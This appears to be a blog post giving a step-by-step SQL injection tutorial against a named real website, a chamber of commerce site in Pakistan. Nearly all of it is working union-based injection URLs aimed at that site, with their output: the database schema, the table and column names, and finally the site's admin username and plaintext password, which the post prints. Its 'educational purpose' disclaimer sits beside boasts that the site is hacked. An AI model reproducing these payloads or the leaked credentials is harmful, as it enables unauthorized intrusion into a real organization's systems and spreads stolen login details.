Guys the hacked site is available now (while posting this topic, but cant say whether it will be available always)
ONLY FOR EDUCATIONAL PURPOSE
sq1 !nj3ct!on
sq1 !nj3ct!ng sites in 10 easy steps :D target regarding this site : http://rcci.org.pk/
STEP1 :-
First Open :
http://rcci.org.pk/noticedet.php?id=1
here you can see no errors but still lets try finding if this site has any error or not
STEP2 :-
add " ' " at last of url :- http://rcci.org.pk/noticedet.php?id=1' (---> ' this added to check errors)
now you can see the error : Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/rcciorg/public_html/noticedet.php on line 67
STEP3 :-
http://rcci.org.pk/noticedet.php?id=1+order+by+6--
now lets see the order where the erorr doesnt exist i tied 1-7 and the last no which didnt had error was 6. 7 was having error
STEP4 :-
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,2,3,4,5,6--
i added all the numbers till 6, now after adding all the numbers till 6 i can see the page output as "2"
STEP5 :-
now replace 2 with version() , this is same in all the sql inj to file the version
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,VERSION(),3,4,5,6--
You can see the version 5.0.51a- (Means its version 5) and very easy to hack :D
STEP6 :-
group_concat(schema_name) is added in 2 to find the concat and information scheme coz it version 5
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,group_concat(schema_name),3,4,5,6+from+
information_schema.schemata--
RESULT : information_schema,rcciorg_rcci
STEP7 :-
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,group_concat(table_name),3,4,5,6+from+
information_schema.tables+where+table_schema=database()--
we can check information_schema from above query ^^^
RESULTS : rcci_admin,rcci_advertise,rcci_downloads,rcci_ec,rcci_embassies,rcci_faqc,rcci_faqs,
rcci_ie,rcci_lib,rcci_links,rcci_mdir,rcci_mform,rcci_newsevents,rcci_noticboard,
rcci_presidents,rcci_prm,rcci_profile,rcci_pub,rcci_sc,rcci_scm,rcci_sect,rcci_sitepages,
rcci_sro,rcci_vision
Now I want To Hack The admin so i will pick up the first table rcci_Admin
STEP8 :-
Now i need to encode the rcci_admin so i need to encode it into hexa values for that i used : http://www.waraxe.us/sql-char-encoder.htmlhttp://rcci.org.pk/noticedet.php?id=1+union+all+select+1,group_concat(column_name),3,4,5,6+from+
information_schema.columns+where+table_name=0x726363695f61646d696e
STEP9 :-
now i know that rcci_admin = 0x726363695f61646d696e , so i used in the above payload
after visiting the page i got : admin_id,admin_username,admin_password,admin_name,admin_email,
admin_phone,admin_createdate,admin_status
oviously i need to know the admin username n password so ill pick up two columns : admin_username and admin_passsword
STEP10 :-
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,group_concat(admin_username,0x3a,
admin_password),3,4,5,6+from+rcci_admin--
In this step i just gave the columns names admin username n pass
so the result i got were :-
admin:player324
therefore
username : admin
password : player324
enjoy hacking in these 10 easy steps :D
SQL Injection explained
Posted on Monday, March 23, 2009
by Ajit
0 comments Filed Under: injection, sql
Subscribe to:
Posts (Atom)
Posts
